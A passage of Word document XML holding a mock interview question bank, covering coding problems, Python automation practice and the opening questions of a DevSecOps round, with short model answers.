        <w:t>A: Use modified binary search. At each mid, determine which half is sorted. If the target lies within the sorted half, move into it; otherwise search the other half. This keeps O(log n) time and O(1) space. Clarify whether duplicates exist, because duplicates complicate the sorted-half decision.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q10. Practice problem: Return the level-order traversal of a binary tree.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Coding/Trees</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use BFS with collections.deque. Start with root, process one level at a time by reading the current queue length, append node values to a level list, and enqueue children. Return the list of levels. Time O(n), space O(w), where w is the maximum tree width.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q11. Practice problem: Count the number of islands in a 2D grid.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Coding/Graphs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Scan every cell. When you find land that is not visited, increment count and run DFS or BFS to mark all connected land cells. Connectivity is usually four-directional unless stated otherwise. Time O(rows * cols), space O(rows * cols) worst case for visited/recursion/queue.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q12. Practice problem: Find the kth largest element in an unsorted array.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Coding/Heap</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use a min-heap of size k: push each number and pop when size exceeds k, leaving the kth largest at heap[0]. Time O(n log k), space O(k). Alternatives are sorting O(n log n) or quickselect average O(n). In Python, heapq is a min-heap.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q13. Practice problem: Merge overlapping intervals.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Coding/Sorting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Sort intervals by start, then iterate and maintain a merged list. If the next interval starts before or at the current merged end, extend the end; otherwise append a new interval. Sorting dominates at O(n log n), with O(n) output space. Clarify whether touching intervals like [1,2] and [2,3] should merge.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q14. Practice problem: Find the minimum cost to climb stairs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Coding/DP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use dynamic programming. dp[i] is the minimum cost to reach step i, and dp[i] = min(dp[i-1] + cost[i-1], dp[i-2] + cost[i-2]). Optimize space by keeping only the previous two values. Time O(n), space O(1). This is similar to climbing stairs but minimizes cost.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q15. Practice problem: Parse a log file and return the top N most frequent IP addresses.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Coding/Python</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Stream the file line by line, extract IP addresses with split or regex depending on log format, and count with collections.Counter. Return counter.most_common(n). This avoids loading the full file into memory. Mention malformed lines, IPv6 support if needed, and memory concerns if cardinality is huge.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q16. How should you explain your approach, complexity, and test cases for a LeetCode or HackerRank-style Python problem?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Coding/Interview</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Clarify the problem, constraints, and edge cases. Explain brute force first if useful, then identify the pattern that improves it. Walk through the algorithm on a small example, code cleanly, test normal and edge cases, then state time and space complexity. If stuck, communicate hypotheses instead of going silent.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 59 - Python Automation and Scripting Round</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. How would you design a Python automation script so it is safe, testable, reusable, and production-ready?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Python Automation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Separate core logic from CLI parsing, use functions/classes with clear inputs and outputs, add dry-run mode for risky operations, structured logging, config files/env vars, retries/timeouts, and clear exit codes. Make it idempotent where possible, write unit tests with mocks, and avoid hardcoded credentials or paths. Production automation should be boring, observable, and safe to rerun.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. How would you write a Python script to scan a directory, find large or old files, and generate a cleanup report?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Python/File Automation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use pathlib or os.scandir to walk files, collect size, modified time, owner/path if needed, and filter by thresholds. Write a CSV/JSON report with recommended actions. Add dry-run by default, exclude patterns, symlink handling, permission-error handling, and logging. Only delete files with explicit confirmation or a separate approved cleanup mode.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. How would you call a paginated REST API in Python, handle retries, and export the results to CSV?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Python/API Automation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use requests or httpx with timeout settings, loop through next-page tokens or page numbers, and retry transient 429/5xx failures with exponential backoff and jitter. Validate response shape, collect or stream records, and write CSV with the csv module. Store API tokens securely, log progress, and handle partial failures gracefully.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. How would you automate a GCP resource inventory report using Python SDKs?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Python/Cloud Automation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use Google Cloud client libraries or Cloud Asset Inventory to list projects and resources, collect metadata such as labels, region, owner, machine type, IAM bindings, and cost tags, then export CSV/JSON or write to BigQuery. Use service account least privilege, pagination, retries, and per-project error handling. Schedule it with Cloud Scheduler/Cloud Run or a CI job.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. How would you use Python to list Kubernetes pods across namespaces and report CrashLoopBackOff or Pending pods?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Python/Kubernetes Automation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use the official Kubernetes Python client, load kubeconfig or in-cluster config, list pods for all namespaces, and inspect pod.status.phase plus container_statuses waiting reasons. Report namespace, pod, container, reason, restart count, node, age, and recent events if possible. Add RBAC least privilege, timeouts, and output as table/CSV/JSON.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. How would you automate Terraform plan validation and summarize risky changes using Python?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Python/Terraform Automation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Run terraform plan with JSON output, parse the plan using json rather than text scraping, and summarize creates, updates, deletes, IAM changes, public network exposure, database changes, and replacements. Fail CI or require approval for risky patterns. Keep the script read-only, deterministic, and covered by tests using sample plan JSON files.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. When would you use subprocess in Python, and how do you run shell commands safely?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Python/Subprocess</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use subprocess when a mature CLI already exists and there is no better SDK/API. Prefer subprocess.run with a list of arguments, shell=False, timeouts, check=True when appropriate, and captured output. Never concatenate untrusted input into shell commands. Log commands safely without secrets, handle return codes, and parse structured output like JSON when the CLI supports it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. How would you speed up a Python automation job that checks hundreds of endpoints or servers?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Python/Concurrency</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: For I/O-bound checks, use asyncio with aiohttp/httpx async client or ThreadPoolExecutor with timeouts and bounded concurrency. Avoid unlimited parallelism because it can overload targets or hit rate limits. Add retries with backoff, per-host result collection, progress logging, and summary output. For CPU-bound work, use multiprocessing or move heavy computation elsewhere.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q9. What logging, error handling, exit codes, and dry-run behavior should a production automation script include?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Python/Logging</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use structured logs with timestamp, operation, target, status, duration, and correlation/run ID. Catch expected errors and continue when safe, but fail fast for invalid config or dangerous states. Use exit code 0 for success, nonzero for failures, and separate partial-success reporting. Dry-run should show exactly what would change without changing anything.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q10. How would you handle secrets, credentials, and sensitive output in Python automation?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Python/Security</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Read secrets from Secret Manager, Vault, environment variables managed by CI, or workload identity. Do not hardcode them, print them, store them in reports, or pass them as CLI args. Redact known secret patterns from logs, scope credentials to least privilege, rotate regularly, and avoid writing sensitive API responses to local files unless encrypted and required.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q11. How would you build a Python CLI tool with arguments, subcommands, config files, and helpful output?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Python/CLI</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Use argparse, Click, or Typer. Define subcommands for different operations, validate arguments, support config files and env var overrides, and provide --dry-run, --verbose, --output json/csv/table, and useful help text. Keep CLI parsing thin and call reusable functions underneath so the logic is testable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q12. How would you process a large CSV or JSONL file in Python without loading everything into memory?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Python/Data Processing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Stream input line by line. For CSV, use csv.DictReader over the file object; for JSONL, parse one line at a time with json.loads. Write results incrementally and keep only required aggregates in memory. For very large grouping/sorting, use chunking, external storage, SQLite, pandas chunks, or BigQuery depending on scale.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q13. How would you write a Python script that checks service health and sends Slack or email alerts?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Python/Monitoring Automation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Read service targets from config, check each endpoint with timeouts, validate status code and optional response content, and collect failures. Send a summarized alert to Slack/email with service, error, latency, and runbook link. Add retries to avoid flapping, rate limit alerts, structured logs, and a nonzero exit code if used in CI or cron.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q14. How would you test Python automation code that calls cloud APIs, shell commands, and external services?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Python/Testing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Separate side-effecting adapters from core logic. Unit test core logic with sample inputs, mock cloud clients and subprocess calls, and use fixture files for API responses or Terraform plans. Add integration tests in a sandbox project when needed. Test failure paths, retries, dry-run behavior, malformed input, and permission errors.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q15. How would you package and distribute an internal Python automation tool for a team?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Python/Packaging</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Create a proper pyproject.toml package with console_scripts entry points, pinned dependencies, type hints, tests, and documentation. Publish to an internal package registry or distribute through a container image if environment consistency matters. Include versioning, changelog, examples, config templates, and CI that runs tests and security scans before release.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q16. Scenario: A manual weekly operations report takes four hours. How would you automate it end to end with Python?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Python/Scenario</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Document the current manual steps, data sources, transformations, validations, and recipients. Build a Python job that fetches data through APIs/SQL/files, validates and cleans it, generates CSV/Excel/HTML output, and sends it by email or uploads it to a shared location. Schedule it, add logging, retries, audit trail, dry-run mode, and alerting when data is missing or report generation fails.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 60 - GT Bharat DevSecOps Specialist Engineering Round</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. Walk me through your DevOps or DevSecOps experience and explain how it matches this GT Bharat Specialist Engineering role.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Introduction/JD Fit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Introduction/JD Fit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Walk me through your DevOps or DevSecOps experience and explain how it matches this GT Bharat Specialist Engineering role.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. What hands-on experience do you have with GCP and GKE, and how have you operated production workloads on Kubernetes?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GCP/GKE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the GCP/GKE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hands-on experience do you have with GCP and GKE, and how have you operated production workloads on Kubernetes?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. A production pod in GKE is stuck in CrashLoopBackOff after a deployment. What exact steps and commands would you use to troubleshoot it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GKE/Troubleshooting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the GKE/Troubleshooting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A production pod in GKE is stuck in CrashLoopBackOff after a deployment. What exact steps and commands would you use to troubleshoot it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. How would you design and maintain a highly scalable and resilient application platform on GKE?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Platform Resilience</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Platform Resilience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design and maintain a highly scalable and resilient application platform on GKE?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. A RHEL/Linux server has high CPU, low disk space, and failing systemd services. How would you investigate and restore service health?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Linux/System Administration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
